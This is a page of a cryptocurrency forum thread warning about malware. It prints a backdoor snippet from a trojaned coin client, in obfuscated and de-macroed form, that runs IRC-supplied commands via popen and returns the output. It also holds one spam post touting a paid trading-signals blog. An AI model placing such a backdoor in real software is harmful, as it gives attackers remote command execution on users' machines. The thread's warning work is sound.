Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 25. (Read 859156 times)

newbie
Activity: 42
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
omg that's terrible thanks for sharing this
member
Activity: 736
Merit: 11
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
Obviously because we all know how much money this forum in digital form of course very tempting for hackers to use it by way of embed malware then we must be more careful
hero member
Activity: 1820
Merit: 775
Hello,

I found a site that check if you have an account that has been compromised in a data breach (https://haveibeenpwned.com/), I want to know from the super geeks if this site is OK ? thank you and have a nice day
newbie
Activity: 2
Merit: 0
If you needed to earn good profit through cryptocurrencies than go to this blog

http://cryptocurrenciesconsultant.blogspot.com/

Just buy its consultant service and he would predict and provide you good signals to buy and sell any crypto coins. His most of predication is about 90% perfect. He had good trading experienced to help out other traders as well.

If you had any question aobut how to buy / sell or any related question about the trading and cryptocurrencies than contact him.

I m also using his service from last few months. so i m sharing with you as well
jr. member
Activity: 72
Merit: 4
I personally, didn"t confront anything like that, luckily, but thank you very much for the information. If I find someone, I'll add it to the list.
hero member
Activity: 1820
Merit: 775
I don't know if this is a malware or what but everytime I copy an address and paste it where I should when I intent to send some funds the address is change some characters are omitted that's why when making transactions I used my phone instead of my pc, does anyone experience this too?..If this is a malware infection what should I do?

Quote
Evrial detects when a bitcoin address is copied to the clipboard, then proceeds to replace it with an address that is under the attacker's domain. However, the virus manages to paste this information into a different application, which makes it more complex, they say.

https://tuscamisetas.net/crypto/new-virus-changes-bitcoin-addresses-from-the-clipboard-to-one-from-the-attacker-criptonews/

hero member
Activity: 1820
Merit: 775
No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:


Thank you very much for that thing, I will post it in the french section. We don't have such a useful thread there  Undecided
newbie
Activity: 29
Merit: 0
If you are on Linux/Unix just use separate user accounts, with restricted access, for each wallet software that tends to be shady
newbie
Activity: 42
Merit: 0
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.


Has anyone heard of people gaining access to peoples private keys by watching them write it down by hacking the laptop camera. OR malware that will replace the pasted address with the hackers address.
jr. member
Activity: 149
Merit: 4
No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:


Thanks for your good suggestion... 
member
Activity: 123
Merit: 11
i love coins
i never klick shortened URLs.
i have all my stuff offline as long as possible
you can make offline transactions via MEW for ETH and erc20 token
https://myetherwallet.github.io/knowledge-base/offline/making-offline-transaction-on-myetherwallet.html
i also use a hardwarewallet
i use a good antivirus-program
i do my own research for new investments.
i never send coins somewhere if someone promises meto send more back!
i know i can not mine btc or other coins via visiting a website. they only want my money
i know websites with 'free bitcoins' is a waste of time or scam.

no one will make me rich because he is so nice
i can only get rich if i do the right investments and be patient!

i don't trust others promising me big earnings!

i do not become greedy!
 Wink

so i never had an infection....


newbie
Activity: 7
Merit: 0
Because this is unregulated the temptation for fraud is becoming more and more frequent! Its scary as a newer person getting involved.

RFB
jr. member
Activity: 126
Merit: 4
Thanks! I am pretty paranoid with all these hacks now I only use a device for crypto, no browsing other sites. It is also good to see this kind of post because awareness is the best kind of prevention.
jr. member
Activity: 124
Merit: 5
Always beware of increased sophisticated malware infection attempts and just believe.
member
Activity: 210
Merit: 10
I led a large number of bounty, recorded everything on a flash drive, all tables, all the links, and what do you think? All burned, all my work, all I did for weeks. I'm tired of this, really it is impossible to fight? Angry
newbie
Activity: 21
Merit: 0
Cheers for the information and keeping the many noobs like myself a little safer from harm!
full member
Activity: 406
Merit: 131
No antivirus will protect you from the 0-day vulnerability. But following the rules of hygiene on the Internet, you at least protect yourself from 98% of threats.
I add that if you really want to go to the link, check it at first with the service virusotal:
newbie
Activity: 48
Merit: 0
Thanks for making this thread. additional knowlegde again for this day thanks a lot  Smiley
member
Activity: 112
Merit: 21
This is terrible, I really thank you, because I almost caught, and now I start to install Adblock, I hope to block all the malwares from online websites.
member
Activity: 86
Merit: 10
 8)Please protect your money! Cool
Always be careful and make the right choices.do not click on strange links, no strange software downloads.
I think this is the most important part.
Pages:
Jump to: